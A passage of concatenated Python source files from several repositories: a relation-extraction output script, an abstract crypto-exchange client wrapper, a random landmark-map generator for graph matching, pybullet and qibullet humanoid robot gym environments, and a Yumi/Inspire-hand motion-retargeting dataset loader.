for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
print("序号: ", idx + 1)
print("原句: ", text)
print("预测的关系: ", text_predicate)
print("预测的实体: ", entity_sort_tuple_list)
print("参考的 spo_slit:", refer_spo_list)
print("\n")
idx += 1
if idx == 100:
break
def produce_output_file(self, OUT_RESULTS_DIR=None, keep_empty_spo_list=False):
filename = "subject_predicate_object_predict_output.json"
output_dict = dict()
for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list():
object_type, subject_type = schemas_dict_relation_2_object_subject_type[text_predicate][0]
subject_list = [value for name, value in entity_sort_tuple_list if name == "SUB"]
subject_list = list(set(subject_list))
subject_list = [value for value in subject_list if len(value) >= 2]
object_list = [value for name, value in entity_sort_tuple_list if name == "OBJ"]
object_list = list(set(object_list))
object_list = [value for value in object_list if len(value) >= 2]
if len(subject_list) == 0 or len(object_list) == 0:
output_dict.setdefault(text, [])
for subject_value in subject_list:
for object_value in object_list:
output_dict.setdefault(text, []).append({"object_type": object_type, "predicate": text_predicate,
"object": object_value, "subject_type": subject_type,
"subject": subject_value})
if keep_empty_spo_list:
filename = "keep_empty_spo_list_" + filename
if OUT_RESULTS_DIR is None:
out_path = filename
else:
out_path = os.path.join(OUT_RESULTS_DIR, filename)
print("生成结果的输出路径是:\t{}".format(out_path))
if not os.path.exists(OUT_RESULTS_DIR):
os.makedirs(OUT_RESULTS_DIR)
result_json_write_f = open(out_path, "w", encoding='utf-8')
count_line_number = 0
count_empty_line_number = 0
for text, spo_list in output_dict.items():
count_line_number += 1
line_dict = dict()
line_dict["text"] = text
line_dict["spo_list"] = spo_list
line_json = json.dumps(line_dict, ensure_ascii=False)
if len(spo_list) == 0:
count_empty_line_number += 1
if keep_empty_spo_list:
result_json_write_f.write(line_json + "\n")
else:
if len(spo_list) > 0:
result_json_write_f.write(line_json + "\n")
print("empty_line: {}, line: {}, percentage: {:.2f}%".format(count_empty_line_number, count_line_number,
(count_empty_line_number / count_line_number) * 100))
if __name__=='__main__':
TEST_DATA_DIR = "bin/subject_object_labeling/sequence_labeling_data/test"
# MODEL_OUTPUT_DIR = "output/sequnce_infer_out/epochs9/ckpt20000"
MODEL_OUTPUT_DIR = None
OUT_RESULTS_DIR = "output/final_text_spo_list_result"
Competition_Mode = True
spo_list_manager = Sorted_relation_and_entity_list_Management(TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
spo_list_manager.produce_output_file(OUT_RESULTS_DIR=OUT_RESULTS_DIR, keep_empty_spo_list=True)
``` |
{
"source": "0anton/pnl-analysis",
"score": 3
} |
#### File: src/abstract/ExchangeClientWrapper.py
```python
from abc import ABC, abstractmethod
from requests import get
from requests.models import PreparedRequest
import json
class ExchangeClientWrapper(ABC):
def __init__(self, client):
self.client = client
@staticmethod
@abstractmethod
def createInstance():
pass
@abstractmethod
def usd_price_for(self,symbol):
pass
@abstractmethod
def get_asset_balance(self, asset):
pass
@abstractmethod
def get_current_asset_balance(self, trading_pair):
pass
@abstractmethod
def get_trades(self, symbol, start_date):
pass
@abstractmethod
def format_data(self,df):
pass
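# Minimal sketch of a concrete subclass (illustrative only; BinanceClientWrapper and the
# underlying client calls shown here are hypothetical, not part of this module):
#
#   class BinanceClientWrapper(ExchangeClientWrapper):
#       @staticmethod
#       def createInstance(api_key, api_secret):
#           return BinanceClientWrapper(SomeExchangeClient(api_key, api_secret))  # hypothetical client
#
#       def usd_price_for(self, symbol):
#           return float(self.client.get_price(symbol))  # hypothetical client call
#
#       # ...the remaining abstract methods must be implemented in the same way.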
``` |
{
"source": "0aqz0/graph-matching",
"score": 3
} |
#### File: 0aqz0/graph-matching/random_data.py
```python
import matplotlib.pyplot as plt
from matplotlib import patches
import numpy as np
import torch
import pickle
import json
import random
import math
import os
# classes_num = 6
labels = ["tree", "car", "bike", "pedestrain", "well", "light"]
colors = ["green", "black", "royalblue", "bisque", "grey", "yellow"]
total_num = 64
min_x = 0
max_x = 640
min_y = 0
max_y = 480
noise_mu = 0
noise_var = 2.0
visual_range = 160.0
visual_theta = 60.0 # degree
save_path = "./data/" + str(max_x) + "x" + str(max_y) +"/"+ str(total_num)
if not os.path.exists(save_path):
os.makedirs(save_path)
def create_global_map():
global_map = []
for _ in range(total_num):
random_x = random.random() * (max_x - min_x) + min_x
random_y = random.random() * (max_y - min_y) + min_y
random_label = random.randint(0, len(labels)-1)
landmark = [random_x, random_y, random_label]
global_map.append(landmark)
return global_map
def visualize_map(map):
for landmark in map:
plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]])
plt.show()
def add_gaussian_noise(map):
noise_map = []
for landmark in map:
noise = np.random.normal(noise_mu, noise_var, 2)
new_x = landmark[0] + noise[0]
new_y = landmark[1] + noise[1]
new_label = landmark[2]
landmark = [new_x, new_y, new_label]
noise_map.append(landmark)
return noise_map
def create_local_map(map):
random_x = random.random() * (max_x - min_x) + min_x
random_y = random.random() * (max_y - min_y) + min_y
random_ori = random.random() * math.pi * 2 - math.pi
base_pose = [random_x, random_y, random_ori]
translation = np.array([-random_x, -random_y]).T
translation = np.expand_dims(translation, axis=1)
rotation = np.array([[np.cos(random_ori-math.pi/2), np.sin(random_ori-math.pi/2)],
[-np.sin(random_ori-math.pi/2), np.cos(random_ori-math.pi/2)]])
local_map = []
match = []
for i, landmark in enumerate(map):
global_pose = np.array([landmark[0], landmark[1]]).T
global_pose = np.expand_dims(global_pose, axis=1)
local_pose = (rotation @ (global_pose + translation))
local_x = local_pose[0][0]
local_y = local_pose[1][0]
local_label = landmark[2]
local_landmark = [local_x, local_y, local_label]
theta = math.atan2(local_landmark[1], local_landmark[0]) / math.pi * 180.0
if math.hypot(local_x, local_y) < visual_range and theta > 90 - visual_theta and theta < 90 + visual_theta:
local_map.append(local_landmark)
match.append(i)
return base_pose, local_map, match
def visualize_all(global_map, local_map, base_pose):
# global map
plt.subplot(121)
plt.gcf().gca().title.set_text("Global Map")
plt.gcf().set_figheight(10)
plt.gcf().set_figwidth(20)
# plt.gcf().gca().set_xlabel("X(m)")
# plt.gcf().gca().set_ylabel("Y(m)")
for landmark in global_map:
plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]])
# base pose
plt.scatter(base_pose[0], base_pose[1], s=80, c='r', marker=(5, 1))
orientation = [base_pose[0] + visual_range * math.cos(base_pose[2]), base_pose[1] + visual_range * math.sin(base_pose[2])]
plt.plot([base_pose[0], orientation[0]], [base_pose[1], orientation[1]], c='r')
arc = patches.Arc((base_pose[0], base_pose[1]), 2 * visual_range, 2 * visual_range, base_pose[2] * 180.0 / math.pi, -visual_theta, visual_theta, color='r', linewidth=2, fill=False)
plt.gcf().gca().add_patch(arc)
theta_min = [base_pose[0] + visual_range * math.cos(base_pose[2] + visual_theta / 180.0 * math.pi), base_pose[1] + visual_range * math.sin(base_pose[2] + visual_theta / 180.0 * math.pi)]
plt.plot([base_pose[0], theta_min[0]], [base_pose[1], theta_min[1]], c='r')
theta_max = [base_pose[0] + visual_range * math.cos(base_pose[2] - visual_theta / 180.0 * math.pi), base_pose[1] + visual_range * math.sin(base_pose[2] - visual_theta / 180.0 * math.pi)]
plt.plot([base_pose[0], theta_max[0]], [base_pose[1], theta_max[1]], c='r')
# local map
plt.subplot(122)
plt.gcf().gca().title.set_text("Local Map")
# plt.gcf().gca().set_xlabel("X(m)")
# plt.gcf().gca().set_ylabel("Y(m)")
plt.scatter(0, 0, s=80, c='r', marker=(5, 1))
for landmark in local_map:
plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]], marker=(5, 0))
plt.show()
def gen_dataset():
# keypoints list(float(x,y))
# scores float(1.)
# descriptors list(int[0,len(labels)]*total_nums)
# matches list(float(x,y))
# matching_scores list(float(1.))
# base_pose float(x,y)
# init raw data
gm = create_global_map()
bp, lm, match = create_local_map(gm)
# make sure that lm is not empty
while(len(lm)==0):
bp, lm, match = create_local_map(gm)
gm = add_gaussian_noise(gm)
bp = torch.Tensor(bp[0:2])
# base map
gsize = len(gm)
keypoints0 = torch.from_numpy(np.array(gm)[:, 0:2])
scores0 = torch.ones(gsize)
descriptors0 = torch.Tensor([[i[2]] for i in gm])
idx = iter(range(gsize))
matches0 = torch.Tensor([next(idx) if i in match else -1 for i in range(gsize)])
matching_scores0 = torch.Tensor([1. if matches0[i] > -1 else 0. for i in range(gsize)])
# match map
lsize = len(lm)
keypoints1 = torch.from_numpy(np.array(lm)[:, 0:2])
scores1 = torch.ones(lsize)
descriptors1 = torch.Tensor([[i[2]] for i in lm])
matches1 = match
matching_scores1 = torch.ones(lsize)
data = dict({'keypoints0': keypoints0, 'keypoints1': keypoints1,
'scores0': scores0, 'scores1': scores1,
'descriptors0': descriptors0, 'descriptors1': descriptors1,
'matches0': matches0, 'matches1': matches1,
'matching_scores0': matching_scores0, 'matching_scores1': matching_scores1,
'base_pose': bp})
return data
if __name__ == '__main__':
# create global map
# global_map = create_global_map()
# visualize_map(global_map)
# add noise
# noise_map = add_gaussian_noise(global_map)
# visualize_map(noise_map)
# create local map
# base_pose, local_map, _= create_local_map(global_map)
# visualize all
# visualize_all(global_map, local_map, base_pose)
# print(gen_dataset())
for i in range(1):
# pickle.dump(gen_dataset(), open(os.path.join(save_path, str(i).zfill(4)+".pkl"), "wb"))
np.save(os.path.join(save_path, str(i).zfill(4)+".npy"), gen_dataset())
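    # The saved sample can be reloaded later, e.g. (illustrative):
    #   sample = np.load(os.path.join(save_path, "0000.npy"), allow_pickle=True).item()
    #   print(sample["keypoints0"].shape, sample["keypoints1"].shape)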
``` |
{
"source": "0aqz0/humanoid-gym",
"score": 2
} |
#### File: humanoid_gym/envs/dancer_env.py
```python
import os
import gym
from gym import spaces
from gym.utils import seeding
import pybullet as p
import pybullet_data
import numpy as np
class DancerEnv(gym.Env):
"""docstring for DancerEnv"""
def __init__(self):
super(DancerEnv, self).__init__()
p.connect(p.GUI)
p.resetDebugVisualizerCamera(cameraDistance=1.5, cameraYaw=0, cameraPitch=-20, cameraTargetPosition=[0,0,0.1])
self.reset()
def step(self, action, custom_reward=None):
p.configureDebugVisualizer(p.COV_ENABLE_SINGLE_STEP_RENDERING)
p.setJointMotorControlArray(self.dancerUid, [self.joint2Index[joint] for joint in self.joint_names], p.POSITION_CONTROL, action)
p.stepSimulation()
# get states
jointStates = {}
for joint in self.joint_names:
jointStates[joint] = p.getJointState(self.dancerUid, self.joint2Index[joint])
linkStates = {}
for link in self.link_names:
linkStates[link] = p.getLinkState(self.dancerUid, self.link2Index[link])
# recover color
for index, color in self.linkColor.items():
p.changeVisualShape(self.dancerUid, index, rgbaColor=color)
# check collision
collision = False
for link in self.link_names:
if len(p.getContactPoints(bodyA=self.dancerUid, linkIndexA=self.link2Index[link])) > 0:
collision = True
for contact in p.getContactPoints(bodyA=self.dancerUid, bodyB=self.dancerUid, linkIndexA=self.link2Index[link]):
print("Collision Occurred in Link {} & Link {}!!!".format(contact[3], contact[4]))
p.changeVisualShape(self.dancerUid, contact[3], rgbaColor=[1,0,0,1])
p.changeVisualShape(self.dancerUid, contact[4], rgbaColor=[1,0,0,1])
self.step_counter += 1
if custom_reward is None:
# default reward
reward = 0
done = False
else:
# custom reward
reward, done = custom_reward(jointStates=jointStates, linkStates=linkStates, collision=collision, step_counter=self.step_counter)
info = {'collision': collision}
observation = [jointStates[joint][0] for joint in self.joint_names]
return observation, reward, done, info
def reset(self):
p.resetSimulation()
self.step_counter = 0
self.dancerUid = p.loadURDF(os.path.join(os.path.dirname(os.path.realpath(__file__)),
"assets/dancer/dancer_urdf_model.URDF"), basePosition=[-0.3,-0.3,0.3], baseOrientation=[0, 0.7071068, -0.7071068, 0],
flags=p.URDF_USE_SELF_COLLISION+p.URDF_USE_SELF_COLLISION_EXCLUDE_ALL_PARENTS)
p.setAdditionalSearchPath(pybullet_data.getDataPath())
self.ground_id = p.loadMJCF("mjcf/ground_plane.xml") # ground plane
p.setGravity(0,0,-10)
p.setPhysicsEngineParameter(numSolverIterations=150)
p.setTimeStep(1./240.)
self.joint_names = []
self.joint2Index = {} # index map to jointName
self.link_names = []
self.link2Index = {} # index map to linkName
self.lower_limits = []
self.upper_limits = []
self.init_angles = []
for index in range(p.getNumJoints(self.dancerUid)):
jointName = p.getJointInfo(self.dancerUid, index)[1].decode('utf-8')
linkName = p.getJointInfo(self.dancerUid, index)[12].decode('utf-8')
self.joint_names.append(jointName)
self.joint2Index[jointName] = index
self.link_names.append(linkName)
self.link2Index[linkName] = index
self.lower_limits.append(-np.pi)
self.upper_limits.append(np.pi)
self.init_angles.append(0)
# modify initial angles to avoid collision
self.init_angles[7], self.init_angles[13] = -0.05, 0.05
self.linkColor = {} # index map to jointColor
for data in p.getVisualShapeData(self.dancerUid):
linkIndex, rgbaColor = data[1], data[7]
self.linkColor[linkIndex] = rgbaColor
self.action_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names)))
self.observation_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names)))
def render(self, mode='human'):
view_matrix = p.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=[0.5,0,0.5],
distance=.7,
yaw=90,
pitch=0,
roll=0,
upAxisIndex=2)
proj_matrix = p.computeProjectionMatrixFOV(fov=60,
aspect=float(960)/720,
nearVal=0.1,
farVal=100.0)
(_, _, px, _, _) = p.getCameraImage(width=960,
height=720,
viewMatrix=view_matrix,
projectionMatrix=proj_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
rgb_array = np.array(px, dtype=np.uint8)
rgb_array = np.reshape(rgb_array, (720,960,4))
rgb_array = rgb_array[:, :, :3]
return rgb_array
def close(self):
p.disconnect()
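# Sketch of how the custom_reward hook of DancerEnv.step can be used (illustrative only;
# the reward shaping below is an arbitrary example, not part of the original environment):
#
#   def my_reward(jointStates, linkStates, collision, step_counter):
#       reward = -1.0 if collision else 0.1
#       done = collision or step_counter >= 500
#       return reward, done
#
#   env = DancerEnv()
#   obs, reward, done, info = env.step(env.init_angles, custom_reward=my_reward)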
```
#### File: humanoid_gym/envs/nao_env_real.py
```python
import os
import gym
from gym import spaces
import pybullet as p
import numpy as np
from scipy.spatial.transform import Rotation as R
from qibullet.robot_posture import NaoPosture
import qi
import time
import threading
class NaoEnvReal(gym.Env):
"""docstring for NaoEnvReal"""
def __init__(self):
super(NaoEnvReal, self).__init__()
self.session = qi.Session()
self.robot_url = '169.254.204.242'
self.session.connect(self.robot_url)
self.motion = self.session.service("ALMotion")
self.motion.setStiffnesses('Body', 1)
self.memory = self.session.service("ALMemory")
self.posture = self.session.service("ALRobotPosture")
self.posture.goToPosture('Stand', 1)
# joint parameters
minAngle = {}
maxAngle = {}
limits = self.motion.getLimits("Body")
jointNames = self.motion.getBodyNames("Body")
for name, limit in zip(jointNames, limits):
minAngle[name] = limit[0]
maxAngle[name] = limit[1]
self.joint_names = ['LShoulderPitch', 'LShoulderRoll', 'LElbowYaw', 'LElbowRoll', 'LWristYaw', 'RShoulderPitch', 'RShoulderRoll', 'RElbowYaw', 'RElbowRoll', 'RWristYaw',
'LHipYawPitch', 'LHipRoll', 'LHipPitch', 'LKneePitch', 'LAnklePitch', 'LAnkleRoll', 'RHipYawPitch', 'RHipRoll', 'RHipPitch', 'RKneePitch', 'RAnklePitch', 'RAnkleRoll']
self.lower_limits = [minAngle[name] for name in self.joint_names]
self.upper_limits = [maxAngle[name] for name in self.joint_names]
# stand pose parameters
pose = NaoPosture('Stand')
pose_dict = {}
for joint_name, joint_value in zip(pose.joint_names, pose.joint_values):
pose_dict[joint_name] = joint_value
self.init_angles = []
for joint_name in self.joint_names:
self.init_angles.append(pose_dict[joint_name])
# self.action_space = spaces.Box(np.array(self.lower_limits), np.array(self.upper_limits))
self.obs_history = []
self.obs_length = 10
self.action_space = spaces.Box(low=-0.5, high=0.5, shape=(len(self.joint_names),), dtype="float32")
self.observation_space = spaces.Box(low=-float('inf'), high=float('inf'), shape=(len(self._get_obs())*self.obs_length,), dtype="float32")
self._max_episode_steps = 1000
def _get_obs(self):
# torso rpy
torsoAngleX = self.memory.getData(
"Device/SubDeviceList/InertialSensor/AngleX/Sensor/Value")
torsoAngleY = self.memory.getData(
"Device/SubDeviceList/InertialSensor/AngleY/Sensor/Value")
torsoAngleZ = self.memory.getData(
"Device/SubDeviceList/InertialSensor/AngleZ/Sensor/Value")
# angles
angles = np.array(self.motion.getAngles(self.joint_names, True))
# get foot contact
l_touch_ground = self.memory.getData('Device/SubDeviceList/LFoot/FSR/RearLeft/Sensor/Value') > 0.1 \
or self.memory.getData('Device/SubDeviceList/LFoot/FSR/RearRight/Sensor/Value') > 0.1
r_touch_ground = self.memory.getData(
'Device/SubDeviceList/RFoot/FSR/RearLeft/Sensor/Value') > 0.1
# observation
obs = angles
return obs
# def _get_obs_history(self):
# self.obs_history.append(self._get_obs())
# if len(self.obs_history) < 3:
# concat_obs = np.concatenate([self.obs_history[-1]]*3, axis=0)
# else:
# concat_obs = np.concatenate(self.obs_history[-3:], axis=0)
# return concat_obs
def step(self, actions, joints=None):
# set joint angles
if isinstance(actions, np.ndarray):
actions = actions.tolist()
self.motion.setAngles(self.joint_names if joints is None else joints, actions, 1.0)
reward = 0
done = False
info = None
return self._get_obs(), reward, done, info
def reset(self):
return self._get_obs()
def render(self, mode='human'):
pass
def close(self):
pass
```
#### File: humanoid_gym/envs/pepper_env.py
```python
import os
import gym
from gym import spaces
import pybullet as p
import numpy as np
from qibullet import SimulationManager
from qibullet import PepperVirtual
from qibullet.robot_posture import PepperPosture
import time
class PepperEnv(gym.Env):
"""docstring for PepperEnv"""
def __init__(self):
super(PepperEnv, self).__init__()
self.simulation_manager = SimulationManager()
self.client = self.simulation_manager.launchSimulation(gui=True)
self.simulation_manager.setLightPosition(self.client, [0,0,100])
self.robot = self.simulation_manager.spawnPepper(self.client, spawn_ground_plane=True)
time.sleep(1.0)
# stand pose parameters
pose = PepperPosture('Stand')
pose_dict = {}
for joint_name, joint_value in zip(pose.joint_names, pose.joint_values):
pose_dict[joint_name] = joint_value
# joint parameters
self.joint_names = ['LShoulderPitch',
'LShoulderRoll',
'LElbowYaw',
'LElbowRoll',
'LWristYaw',
'LHand',
'RShoulderPitch',
'RShoulderRoll',
'RElbowYaw',
'RElbowRoll',
'RWristYaw',
'RHand']
self.lower_limits = []
self.upper_limits = []
self.init_angles = []
for joint_name in self.joint_names:
joint = self.robot.joint_dict[joint_name]
self.lower_limits.append(joint.getLowerLimit())
self.upper_limits.append(joint.getUpperLimit())
self.init_angles.append(pose_dict[joint_name])
self.link_names = []
for joint_name in self.joint_names:
linkName = p.getJointInfo(self.robot.getRobotModel(), self.robot.joint_dict[joint_name].getIndex())[12].decode("utf-8")
self.link_names.append(linkName)
self.action_space = spaces.Box(np.array([-1]*3 + self.lower_limits), np.array([1]*3 + self.upper_limits))
self.observation_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names)))
def step(self, actions):
if isinstance(actions, np.ndarray):
actions = actions.tolist()
# set joint angles
self.robot.setAngles(self.joint_names, actions, 1.0)
# get observations
observation = {
'position': self.robot.getPosition(),
'anglesPosition': self.robot.getAnglesPosition(self.joint_names),
'anglesVelocity': self.robot.getAnglesVelocity(self.joint_names),
# TODO: add more observations
}
# TODO: design your reward
reward = 0
done = False
info = {}
return observation, reward, done, info
def reset(self):
self.simulation_manager.removePepper(self.robot)
self.robot = self.simulation_manager.spawnPepper(self.client, spawn_ground_plane=True)
time.sleep(1.0)
def render(self, mode='human'):
view_matrix = p.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=[0.5,0,0.5],
distance=.7,
yaw=90,
pitch=0,
roll=0,
upAxisIndex=2)
proj_matrix = p.computeProjectionMatrixFOV(fov=60,
aspect=float(960)/720,
nearVal=0.1,
farVal=100.0)
(_, _, px, _, _) = p.getCameraImage(width=960,
height=720,
viewMatrix=view_matrix,
projectionMatrix=proj_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
rgb_array = np.array(px, dtype=np.uint8)
rgb_array = np.reshape(rgb_array, (720,960,4))
rgb_array = rgb_array[:, :, :3]
return rgb_array
def close(self):
p.disconnect()
``` |
{
"source": "0aqz0/neural-retargeting",
"score": 2
} |
#### File: 0aqz0/neural-retargeting/dataset.py
```python
import torch
import torch_geometric.transforms as transforms
from torch_geometric.data import Data as OldData
from torch_geometric.data import InMemoryDataset
import os
import math
import numpy as np
from numpy.linalg import inv
from scipy.spatial.transform import Rotation as R
from utils.urdf2graph import yumi2graph, hand2graph
import h5py
class Data(OldData):
def __inc__(self, key, value):
if key == 'edge_index':
return self.num_nodes
elif key == 'l_hand_edge_index':
return self.l_hand_num_nodes
elif key == 'r_hand_edge_index':
return self.r_hand_num_nodes
else:
return 0
"""
Normalize by a constant coefficient
"""
class Normalize(object):
def __call__(self, data, coeff=100.0):
if hasattr(data, 'x'):
data.x = data.x/coeff
if hasattr(data, 'l_hand_x'):
data.l_hand_x = data.l_hand_x/coeff
if hasattr(data, 'r_hand_x'):
data.r_hand_x = data.r_hand_x/coeff
return data
def __repr__(self):
return '{}()'.format(self.__class__.__name__)
"""
Target Dataset for Yumi Manipulator
"""
class YumiDataset(InMemoryDataset):
yumi_cfg = {
'joints_name': [
'yumi_joint_1_l',
'yumi_joint_2_l',
'yumi_joint_7_l',
'yumi_joint_3_l',
'yumi_joint_4_l',
'yumi_joint_5_l',
'yumi_joint_6_l',
'yumi_joint_1_r',
'yumi_joint_2_r',
'yumi_joint_7_r',
'yumi_joint_3_r',
'yumi_joint_4_r',
'yumi_joint_5_r',
'yumi_joint_6_r',
],
'edges': [
['yumi_joint_1_l', 'yumi_joint_2_l'],
['yumi_joint_2_l', 'yumi_joint_7_l'],
['yumi_joint_7_l', 'yumi_joint_3_l'],
['yumi_joint_3_l', 'yumi_joint_4_l'],
['yumi_joint_4_l', 'yumi_joint_5_l'],
['yumi_joint_5_l', 'yumi_joint_6_l'],
['yumi_joint_1_r', 'yumi_joint_2_r'],
['yumi_joint_2_r', 'yumi_joint_7_r'],
['yumi_joint_7_r', 'yumi_joint_3_r'],
['yumi_joint_3_r', 'yumi_joint_4_r'],
['yumi_joint_4_r', 'yumi_joint_5_r'],
['yumi_joint_5_r', 'yumi_joint_6_r'],
],
'root_name': [
'yumi_joint_1_l',
'yumi_joint_1_r',
],
'end_effectors': [
'yumi_joint_6_l',
'yumi_joint_6_r',
],
'shoulders': [
'yumi_joint_2_l',
'yumi_joint_2_r',
],
'elbows': [
'yumi_joint_3_l',
'yumi_joint_3_r',
],
}
def __init__(self, root, transform=None, pre_transform=None):
super(YumiDataset, self).__init__(root, transform, pre_transform)
self.data, self.slices = torch.load(self.processed_paths[0])
@property
def raw_file_names(self):
self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')]
return self._raw_file_names
@property
def processed_file_names(self):
return ['data.pt']
def process(self):
data_list = []
for file in self.raw_file_names:
data_list.append(yumi2graph(file, self.yumi_cfg))
if self.pre_filter is not None:
data_list = [data for data in data_list if self.pre_filter(data)]
if self.pre_transform is not None:
data_list = [self.pre_transform(data) for data in data_list]
data, slices = self.collate(data_list)
torch.save((data, slices), self.processed_paths[0])
"""
Map glove data to inspire hand data
"""
def linear_map(x_, min_, max_, min_hat, max_hat):
x_hat = 1.0 * (x_ - min_) / (max_ - min_) * (max_hat - min_hat) + min_hat
return x_hat
def map_glove_to_inspire_hand(glove_angles):
### This function linearly maps the Wiseglove angle measurement to Inspire hand's joint angles.
## preparation, specify the range for linear scaling
    hand_start = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3, 0.1, 0.0, 0.0]) # already in radians
hand_final = np.array([-1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -0.75, 0.0, -0.2, -0.15])
    glove_start = np.array([0, 0, 53, 0, 0, 22, 0, 0, 22, 0, 0, 35, 0, 0])# * pi / 180.0 # degrees to radians
glove_final = np.array([45, 100, 0, 90, 120, 0, 90, 120, 0, 90, 120, 0, 90, 120])# * pi / 180.0
length = glove_angles.shape[0]
hand_angles = np.zeros((length, 12)) # 12 joints
## Iterate to map angles
for i in range(length):
# four fingers' extension/flexion (abduction/adduction are dumped)
hand_angles[i, 0] = linear_map(glove_angles[i, 3], glove_start[3], glove_final[3], hand_start[0], hand_final[0]) # Link1 (joint name)
hand_angles[i, 1] = linear_map(glove_angles[i, 4], glove_start[4], glove_final[4], hand_start[1], hand_final[1]) # Link11
hand_angles[i, 2] = linear_map(glove_angles[i, 6], glove_start[6], glove_final[6], hand_start[2], hand_final[2]) # Link2
hand_angles[i, 3] = linear_map(glove_angles[i, 7], glove_start[7], glove_final[7], hand_start[3], hand_final[3]) # Link22
hand_angles[i, 4] = linear_map(glove_angles[i, 9], glove_start[9], glove_final[9], hand_start[4], hand_final[4]) # Link3
hand_angles[i, 5] = linear_map(glove_angles[i, 10], glove_start[10], glove_final[10], hand_start[5], hand_final[5]) # Link33
hand_angles[i, 6] = linear_map(glove_angles[i, 12], glove_start[12], glove_final[12], hand_start[6], hand_final[6]) # Link4
hand_angles[i, 7] = linear_map(glove_angles[i, 13], glove_start[13], glove_final[13], hand_start[7], hand_final[7]) # Link44
# thumb
hand_angles[i, 8] = (hand_start[8] + hand_final[8]) / 2.0 # Link5 (rotation about z axis), fixed!
hand_angles[i, 9] = linear_map(glove_angles[i, 2], glove_start[2], glove_final[2], hand_start[9], hand_final[9]) # Link 51
hand_angles[i, 10] = linear_map(glove_angles[i, 0], glove_start[0], glove_final[0], hand_start[10], hand_final[10]) # Link 52
hand_angles[i, 11] = linear_map(glove_angles[i, 1], glove_start[1], glove_final[1], hand_start[11], hand_final[11]) # Link 53
return hand_angles
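# --- Illustrative example (added for clarity, not part of the original file) ---
# Demonstrates the shape convention of map_glove_to_inspire_hand: it takes per-frame
# glove readings with 14 flexion angles and returns 12 Inspire-hand joint angles per
# frame. The random input below is only a placeholder for real Wiseglove data.
def _example_map_glove_to_inspire_hand():
    fake_glove_angles = np.random.uniform(low=0.0, high=45.0, size=(5, 14))  # 5 frames, 14 sensors
    hand_angles = map_glove_to_inspire_hand(fake_glove_angles)
    print(hand_angles.shape)  # (5, 12)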
"""
Parse H5 File
"""
def parse_h5(filename, selected_key=None):
data_list = []
h5_file = h5py.File(filename, 'r')
# print(filename, h5_file.keys(), len(h5_file.keys()))
if selected_key is None:
keys = h5_file.keys()
else:
keys = [selected_key]
for key in keys:
if '语句' in key and selected_key is None:
            print('Skipping ' + key)
continue
# glove data
l_glove_angle = h5_file[key + '/l_glove_angle'][:]
r_glove_angle = h5_file[key + '/r_glove_angle'][:]
l_hand_angle = map_glove_to_inspire_hand(l_glove_angle)
r_hand_angle = map_glove_to_inspire_hand(r_glove_angle)
# position data
l_shoulder_pos = h5_file[key + '/l_up_pos'][:]
r_shoulder_pos = h5_file[key + '/r_up_pos'][:]
l_elbow_pos = h5_file[key + '/l_fr_pos'][:]
r_elbow_pos = h5_file[key + '/r_fr_pos'][:]
l_wrist_pos = h5_file[key + '/l_hd_pos'][:]
r_wrist_pos = h5_file[key + '/r_hd_pos'][:]
# quaternion data
l_shoulder_quat = R.from_quat(h5_file[key + '/l_up_quat'][:])
r_shoulder_quat = R.from_quat(h5_file[key + '/r_up_quat'][:])
l_elbow_quat = R.from_quat(h5_file[key + '/l_fr_quat'][:])
r_elbow_quat = R.from_quat(h5_file[key + '/r_fr_quat'][:])
l_wrist_quat = R.from_quat(h5_file[key + '/l_hd_quat'][:])
r_wrist_quat = R.from_quat(h5_file[key + '/r_hd_quat'][:])
# rotation matrix data
l_shoulder_matrix = l_shoulder_quat.as_matrix()
r_shoulder_matrix = r_shoulder_quat.as_matrix()
l_elbow_matrix = l_elbow_quat.as_matrix()
r_elbow_matrix = r_elbow_quat.as_matrix()
l_wrist_matrix = l_wrist_quat.as_matrix()
r_wrist_matrix = r_wrist_quat.as_matrix()
# transform to local coordinates
# l_wrist_matrix = l_wrist_matrix * inv(l_elbow_matrix)
# r_wrist_matrix = r_wrist_matrix * inv(r_elbow_matrix)
# l_elbow_matrix = l_elbow_matrix * inv(l_shoulder_matrix)
# r_elbow_matrix = r_elbow_matrix * inv(r_shoulder_matrix)
# l_shoulder_matrix = l_shoulder_matrix * inv(l_shoulder_matrix)
# r_shoulder_matrix = r_shoulder_matrix * inv(r_shoulder_matrix)
# euler data
l_shoulder_euler = R.from_matrix(l_shoulder_matrix).as_euler('zyx', degrees=True)
r_shoulder_euler = R.from_matrix(r_shoulder_matrix).as_euler('zyx', degrees=True)
l_elbow_euler = R.from_matrix(l_elbow_matrix).as_euler('zyx', degrees=True)
r_elbow_euler = R.from_matrix(r_elbow_matrix).as_euler('zyx', degrees=True)
l_wrist_euler = R.from_matrix(l_wrist_matrix).as_euler('zyx', degrees=True)
r_wrist_euler = R.from_matrix(r_wrist_matrix).as_euler('zyx', degrees=True)
total_frames = l_shoulder_pos.shape[0]
for t in range(total_frames):
data = parse_arm(l_shoulder_euler[t], l_elbow_euler[t], l_wrist_euler[t], r_shoulder_euler[t], r_elbow_euler[t], r_wrist_euler[t],
l_shoulder_pos[t], l_elbow_pos[t], l_wrist_pos[t], r_shoulder_pos[t], r_elbow_pos[t], r_wrist_pos[t],
l_shoulder_quat[t], l_elbow_quat[t], l_wrist_quat[t], r_shoulder_quat[t], r_elbow_quat[t], r_wrist_quat[t])
data_list.append(data)
return data_list, l_hand_angle, r_hand_angle
def parse_arm(l_shoulder_euler, l_elbow_euler, l_wrist_euler, r_shoulder_euler, r_elbow_euler, r_wrist_euler,
